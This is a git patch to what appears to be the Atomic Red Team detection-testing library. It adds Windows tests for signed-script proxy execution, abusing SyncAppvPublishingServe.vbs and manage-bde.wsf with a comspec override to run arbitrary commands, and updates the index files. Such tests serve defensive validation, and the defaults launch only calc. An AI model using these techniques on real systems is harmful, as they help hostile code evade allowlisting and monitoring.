From fdd29272852b78f315b784f3bc6d99d272ea35c3 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Thu, 14 Nov 2019 15:07:28 -0600 Subject: [PATCH] T1216 Added tests for proxied script execution (#627) * Added script proxy tests * Generate docs from job=validate_atomics_generate_docs branch=t1216_tests * Moving command * Generate docs from job=validate_atomics_generate_docs branch=t1216_tests --- atomics/T1216/T1216.md | 55 +++++++++++++++++++++++++++++ atomics/T1216/T1216.yaml | 42 ++++++++++++++++++++++ atomics/index.md | 4 +++ atomics/index.yaml | 76 ++++++++++++++++++++++++++++++++++++++++ atomics/windows-index.md | 4 +++ 5 files changed, 181 insertions(+) diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index 5e8bd42a..8df9785f 100644 --- a/atomics/T1216/T1216.md +++ b/atomics/T1216/T1216.md @@ -10,6 +10,10 @@ There are several other signed scripts that may be used in a similar manner. (Ci - [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass) +- [Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserve-signed-script-powershell-command-execution) + +- [Atomic Test #3 - manage-bde.wsf Signed Script Command Execution](#atomic-test-3---manage-bdewsf-signed-script-command-execution) +
@@ -31,4 +35,55 @@ cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs local +
+
+ +## Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution +Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_to_execute | A PowerShell command to execute. | string | Start-Process calc| + +#### Run it with `command_prompt`! +``` +C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” +``` + + + +
+
+ +## Atomic Test #3 - manage-bde.wsf Signed Script Command Execution +Executes the signed manage-bde.wsf script with options to execute an arbitrary command. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_to_execute | A command to execute. | Path | C:\Windows\System32\calc.exe| + +#### Run it with `command_prompt`! +``` +set comspec=#{command_to_execute} +cscript manage-bde.wsf +``` + +#### Commands to Check Prerequisites: +``` + +``` + +#### Cleanup Commands: +``` +set comspec=C:\Windows\System32\cmd.exe +``` +
diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index 4de8acfa..dc422440 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -21,3 +21,45 @@ atomic_tests: elevation_required: false command: | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" + +- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution + description: | + Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command. + + supported_platforms: + - windows + + input_arguments: + command_to_execute: + description: A PowerShell command to execute. + type: string + default: Start-Process calc + + executor: + name: command_prompt + elevation_required: false + command: | + C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” + +- name: manage-bde.wsf Signed Script Command Execution + description: | + Executes the signed manage-bde.wsf script with options to execute an arbitrary command. + + supported_platforms: + - windows + + input_arguments: + command_to_execute: + description: A command to execute. + type: Path + default: C:\Windows\System32\calc.exe + + executor: + name: command_prompt + elevation_required: false + prereq_command: | # for the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success. You can remove the prereq_command section if there are no pre-req's + command: | # these are the actaul attack commands, at least one command must be provided + set comspec=#{command_to_execute} + cscript manage-bde.wsf + cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands + set comspec=C:\Windows\System32\cmd.exe \ No newline at end of file diff --git a/atomics/index.md b/atomics/index.md index e1b2e7c2..1f94994c 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -363,6 +363,8 @@ - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] + - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows] + - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows] - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1151 Space after Filename](./T1151/T1151.md) - Atomic Test #1: Space After Filename [macos] @@ -747,6 +749,8 @@ - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] + - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows] + - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows] - [T1153 Source](./T1153/T1153.md) - Atomic Test #1: Execute Script using Source [macos, linux] - Atomic Test #2: Execute Script using Source Alias [macos, linux] diff --git a/atomics/index.yaml b/atomics/index.yaml index 116f896d..8b5eb01f 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -10664,6 +10664,44 @@ defense-evasion: localhost "script:#{remote_payload}" ' + - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution + description: 'Executes the signed SyncAppvPublishingServe script with options + to execute an arbitrary PowerShell command. + +' + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: A PowerShell command to execute. + type: string + default: Start-Process calc + executor: + name: command_prompt + elevation_required: false + command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” + +' + - name: manage-bde.wsf Signed Script Command Execution + description: 'Executes the signed manage-bde.wsf script with options to execute + an arbitrary command. + +' + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: A command to execute. + type: Path + default: C:\Windows\System32\calc.exe + executor: + name: command_prompt + elevation_required: false + prereq_command: '' + command: | + set comspec=#{command_to_execute} + cscript manage-bde.wsf + cleanup_command: set comspec=C:\Windows\System32\cmd.exe T1151: technique: x_mitre_data_sources: @@ -21091,6 +21129,44 @@ execution: localhost "script:#{remote_payload}" ' + - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution + description: 'Executes the signed SyncAppvPublishingServe script with options + to execute an arbitrary PowerShell command. + +' + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: A PowerShell command to execute. + type: string + default: Start-Process calc + executor: + name: command_prompt + elevation_required: false + command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” + +' + - name: manage-bde.wsf Signed Script Command Execution + description: 'Executes the signed manage-bde.wsf script with options to execute + an arbitrary command. + +' + supported_platforms: + - windows + input_arguments: + command_to_execute: + description: A command to execute. + type: Path + default: C:\Windows\System32\calc.exe + executor: + name: command_prompt + elevation_required: false + prereq_command: '' + command: | + set comspec=#{command_to_execute} + cscript manage-bde.wsf + cleanup_command: set comspec=C:\Windows\System32\cmd.exe T1153: technique: x_mitre_data_sources: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a4a50715..2182952e 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -151,6 +151,8 @@ - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] + - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows] + - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows] - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1099 Timestomp](./T1099/T1099.md) @@ -609,6 +611,8 @@ - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows] - [T1216 Signed Script Proxy Execution](./T1216/T1216.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] + - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows] + - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows] - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]